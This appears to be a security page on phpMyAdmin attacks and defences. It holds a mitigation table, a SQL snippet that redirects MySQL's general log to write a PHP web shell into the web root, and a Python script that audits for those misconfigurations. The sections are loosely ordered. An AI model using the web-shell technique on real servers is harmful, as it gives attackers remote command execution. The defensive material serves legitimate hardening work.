
Phpmyadmin - Hacktricks Verified

| Attack | Mitigation |
|--------|------------|
| File write RCE | Set secure_file_priv to a dedicated safe directory or to NULL (which disables file import/export) rather than "/tmp/" or an empty string (an empty string removes the restriction entirely). |
| General log injection | Monitor changes to the general_log and general_log_file variables; make them read-only for the web application's database user. |
| Brute force | Set $cfg['LoginCookieValidity'] = 900 and add fail2ban on /phpmyadmin. |
| LFI (old versions) | Upgrade to 5.2.1+; remove /doc/ and /changelog.php from production. |

File write RCE requires the FILE privilege and suitable OS permissions (for example, MySQL running as root, or weak directory permissions).

If secure_file_priv is set but you can change global variables:

```sql
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']); ?>";
```

Verification: requires the SUPER or ADMIN privilege. Works on MySQL 5.x/8.x if the log directory is writable by the mysql user.
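As an added defender-side example (not part of the original page), the following Python parses the output of SHOW GLOBAL VARIABLES and flags the two server settings the technique above depends on: an empty secure_file_priv and a general_log that writes into a web-served or PHP-named path. The WEB_ROOTS list and both sample outputs are constructed for this example.

```python
"""Audit MySQL/MariaDB globals for the two misconfigurations discussed above.
Added example with constructed sample data; WEB_ROOTS is an assumption."""
from pathlib import PurePosixPath

# Assumed document roots of web servers on the same host (adjust per deployment).
WEB_ROOTS = ("/var/www", "/srv/http", "/usr/share/nginx/html")

# Constructed samples in the tab-separated shape printed by
# `mysql -e "SHOW GLOBAL VARIABLES"`; not captured from a real server.
RISKY_SAMPLE = """Variable_name\tValue
secure_file_priv\t
general_log\tON
general_log_file\t/var/www/html/shell.php
log_output\tFILE"""
HARDENED_SAMPLE = """Variable_name\tValue
secure_file_priv\t/var/lib/mysql-files/
general_log\tOFF
general_log_file\t/var/lib/mysql/host.log
log_output\tTABLE"""

def parse_show_variables(text: str) -> dict:
    """Turn 'Variable_name<TAB>Value' rows into a dict, skipping the header."""
    rows = (line.partition("\t") for line in text.strip().splitlines())
    return {n.strip(): v.strip() for n, _, v in rows if n != "Variable_name"}

def under_web_root(path: str) -> bool:
    """True if path is one of WEB_ROOTS or lies beneath one of them."""
    p = PurePosixPath(path)
    return any(PurePosixPath(r) == p or PurePosixPath(r) in p.parents for r in WEB_ROOTS)

def audit(variables: dict) -> list:
    """Return one finding string per risky setting; an empty list means clean."""
    findings = []
    sfp = variables.get("secure_file_priv", "")
    if sfp == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE / LOAD DATA are unrestricted")
    elif sfp.upper() != "NULL" and under_web_root(sfp):
        findings.append(f"secure_file_priv lies inside a web root: {sfp}")
    if variables.get("general_log", "OFF").upper() == "ON":
        log_file = variables.get("general_log_file", "")
        if under_web_root(log_file) or log_file.endswith((".php", ".phtml")):
            findings.append(f"general_log_file is web-served or PHP-named: {log_file}")
        if "FILE" in variables.get("log_output", "FILE").upper():
            findings.append("general_log is ON with FILE output: full query text is written to disk")
    return findings

if __name__ == "__main__":
    for label, sample in (("risky", RISKY_SAMPLE), ("hardened", HARDENED_SAMPLE)):
        print(label, audit(parse_show_variables(sample)) or ["no findings"])
```

Pipe live output into the parser (`mysql -e "SHOW GLOBAL VARIABLES"`) from a scheduled job to catch the variable changes the mitigation table asks you to monitor.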

Target: phpMyAdmin (typically http://target/phpmyadmin, http://target/phpmyadmin/, or /pma). Prerequisite: network access to the phpMyAdmin interface, or leaked credentials.

This guide covers verified techniques to leverage phpMyAdmin for remote code execution (RCE), file read/write, and privilege escalation.


Once logged in, the game is over for the server. Verification: Requires SUPER or ADMIN privilege

Sometimes an attacker only gets low-privilege database access with no file write. That is still dangerous.
